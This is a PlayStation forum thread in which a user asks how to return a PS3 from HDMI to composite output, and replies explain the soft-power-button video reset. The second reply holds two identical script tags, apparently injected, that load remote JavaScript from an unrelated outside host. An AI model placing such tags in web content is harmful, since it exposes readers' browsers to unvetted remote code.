PlayStation®3

PS3 General

PS3 General

21 Nov 2012
By: ReDub-

3 Posts

HDMI Output to Regular (Red, White and Yellow) Cable

4 Replies 409 Views Created 21-11-2012

When I connected my HDMI cable to my PS3 it came up with a message that I didn't get to read because my little brother skipped the message and now when I try to connect the PS3 using the regular cables it does not work and do not know why (the cables have worked up until now and I know there are no problems with them because I tested them on my PS2). Any help on how to reset the settings so that I can use my regular cables again.

Please use plain text.
Message 1 of 5 (409 Views)
0 Kudos
Level 1

Re: HDMI Output to Regular (Red, White and Yellow) Cable

connect your ps3 with the hdmi cable and then go to your settings and change to the red yellow and white cables.then plug in those cables and then go to the av channel on ur tv and u should have a picture

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script> <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>
Please use plain text.
Message 2 of 5 (402 Views)
0 Kudos
Level 9

You can also do a reset of the video settings by holding the soft power button down a few seconds until it beeps. When powering it back up it will go into the default settings...

Remember when I said I'd kill u last?? .... I LIIIIED!!
Uncharted Quadruple Platinum Club, 2008-12
Please use plain text.
Message 3 of 5 (392 Views)
0 Kudos

[ Edited ]

Hey ReDub-,

Sorry to hear about the issue you are currently facing.

You can try doing the soft reset as suggested by kiwiatlarge by holding down the power button until you hear 2 beeps. It's best advised to only have your regular cables plugged in when doing this as you don't want any conflicting with the HDMI.

Cheers.

Please use plain text.
Message 4 of 5 (374 Views)
0 Kudos
Level 11

Just to clarify all this......

Plug in your HDMI cable and select HDMI as the source on your TV

With the PS3 in standby, hold your finger on the power button until you hear the 2nd beeps (about 5secs)....release finger........this will reset the audio video settings (which are the ones you missed cuz of the young fella)) they're the one's that prompt you to select if you want audio & video output thru HDMI....select YES (assuming you don't have an optical cable connected)....the screen will go blank for a couple of secs, stating the MAX resolution and if you accept these settings...............YES

Once all that is done you can then go to System Settings........which you won't need to do anyway

PSNsig

1TB SSHD PS4 – Samsung 40” 3D LED – Yamaha 5x 100watt Receiver
Looking for a clan to join ?? check out Beyond The Grave [BTG]
Please use plain text.
Message 5 of 5 (361 Views)
0 Kudos